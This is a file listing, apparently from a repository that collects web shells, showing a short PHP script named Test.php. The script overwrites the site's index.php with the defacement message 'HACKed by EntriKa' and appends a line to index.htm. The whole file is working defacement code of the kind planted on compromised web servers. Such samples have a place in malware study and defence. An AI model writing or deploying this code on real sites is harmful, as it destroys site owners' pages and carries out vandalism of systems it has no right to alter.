webshell/xakep-shells/PHP/Test.php.php.txt
2014-05-18 09:06:34 +08:00

13 lines
213 B
Text

<?php
$entry_line="HACKed by EntriKa";
$fp = fopen("index.php", "w");
fputs($fp, $entry_line);
fclose($fp);
?>
<?
$fp =@fopen("index.htm", "a+");
$yazi = "test" . "\r\n";
fwrite ($fp, "$yazi");
fclose ($fp);
?>